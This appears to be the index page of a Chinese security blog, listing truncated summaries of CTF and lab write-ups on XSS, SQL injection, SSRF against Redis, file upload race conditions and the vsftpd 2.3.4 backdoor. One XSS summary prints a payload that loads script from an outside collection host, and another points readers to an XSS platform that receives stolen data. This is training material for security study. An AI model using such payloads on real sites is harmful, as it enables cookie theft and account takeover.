会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
CVE-Lemon
博客园
首页
新随笔
联系
订阅
管理
上一页
1
2
3
4
5
6
7
8
9
下一页
2023年8月28日
文件上传漏洞之条件竞争
摘要: 这里拿upload-labs的第18关做演示 首先先看代码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES[
阅读全文
posted @ 2023-08-28 21:45 CVE-柠檬i
阅读(558)
评论(0)
推荐(0)
2023年8月7日
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入)
摘要: 前言什么是UNC什么是DNSlog注入DNSlog注入的条件防止DNSlog注入的几个措施 sqli-labs试验 前言 前几天面试的时候,面试官问我知不知道OOB(带外数据)。 当时我蒙了,确实没听说过这个东西,然后面试官告诉我原来dnslog注入就是带外通信的一种。 什么是UNC UNC(Uni
阅读全文
posted @ 2023-08-07 01:13 CVE-柠檬i
阅读(1052)
评论(0)
推荐(1)
2023年8月6日
SQL注入上传文件获取shell
摘要: SQL注入写文件的三个必要条件 Web目录有读写权限: 当目标网站的Web目录具有读写权限时,攻击者可以通过注入恶意SQL语句将恶意文件写入服务器上的Web目录。 知道文件的绝对路径: 攻击者需要知道目标系统上的文件的绝对路径,以便将恶意内容写入到指定目录的文件中。 secure_file_priv
阅读全文
posted @ 2023-08-06 01:19 CVE-柠檬i
阅读(205)
评论(0)
推荐(0)
2023年7月8日
BUUCTF Web CyberPunk WriteUp
摘要: 想直接查看payload的点这里 前言 二次注入(Second-Order Injection)是指攻击者在应用程序中注入恶意数据,然后在稍后的操作或不同的上下文中再次使用该恶意数据,导致安全漏洞。它通常发生在数据库查询、数据导出、报告生成等过程中。 典型的二次注入示例包括在用户注册时注入恶意代码,
阅读全文
posted @ 2023-07-08 02:04 CVE-柠檬i
阅读(68)
评论(0)
推荐(0)
2023年7月5日
CTFHub XSS DOM跳转 WriteUp
摘要: 前文:DOM反射XSS 进入网站,直接查看源代码,下面是关键代码,这里有xss漏洞: <script> var target = location.search.split("=") if (target[0].slice(1) == "jumpto") { location.href = targ
阅读全文
posted @ 2023-07-05 03:05 CVE-柠檬i
阅读(458)
评论(0)
推荐(0)
CTFHub XSS 过滤关键词 WriteUp
摘要: 前文链接:DOM反射xss 这次直接浏览器输入payload,发现 script 被过滤掉了 </textarea>'"><script src=http://xsscom.com//cZ2vvZ></script> 碰到这种情况不要慌,下面给出两种方法绕过过滤关键字。 双写绕过 </textare
阅读全文
posted @ 2023-07-05 00:42 CVE-柠檬i
阅读(84)
评论(0)
推荐(0)
2023年7月4日
CTFHub XSS DOM反射 WriteUp
摘要: 前言:本文需要注册一个xss平台,以接收xss反弹回来的数据,请自己在互联网上寻找合适的xss平台 1. 构造闭合语句 根据题目提示,判断网站存在DOM xss漏洞 查看页面源代码,发现关键位置,其中CTFHub is very niubility 是我们的可控范围 <script> $("#tex
阅读全文
posted @ 2023-07-04 23:44 CVE-柠檬i
阅读(496)
评论(3)
推荐(0)
用Linux搭建网站(LAMP)
摘要: 安装环境 演示服务器版本为CentOS 8 安装apache 下载apache yum install httpd httpd-devel 启动apache服务器 systemctl start httpd 设置apache开机自启 systemctl enable httpd 查看apache运行
阅读全文
posted @ 2023-07-04 20:27 CVE-柠檬i
阅读(46)
评论(0)
推荐(0)
2022年12月31日
CTFHub SSRF Redis协议 WriteUp
摘要: CTFHub SSRF Redis协议 进入环境,可以看到url格式为: http://challenge-2c082607df3fa433.sandbox.ctfhub.com:10800/?url= 1. 生成 根据题目,选择用工具 Gopherus 进行生成 payload 查看工具提示,使用
阅读全文
posted @ 2022-12-31 17:01 CVE-柠檬i
阅读(497)
评论(0)
推荐(0)
2022年10月29日
VSFTPD2.3.4(笑脸漏洞)复现
摘要: vsftpd2.3.4笑脸漏洞复现 目标服务器:metasploitable2(192.168.171.11) 渗透机:Kali(192.168.171.21) 方法一:手动复现 首先用kali扫描一下目标机端口 nmap -sV 192.168.171.11 然后用ftp连接该ip: 用户名随便输
阅读全文
posted @ 2022-10-29 23:03 CVE-柠檬i
阅读(192)
评论(0)
推荐(0)
上一页
1
2
3
4
5
6
7
8
9
下一页
公告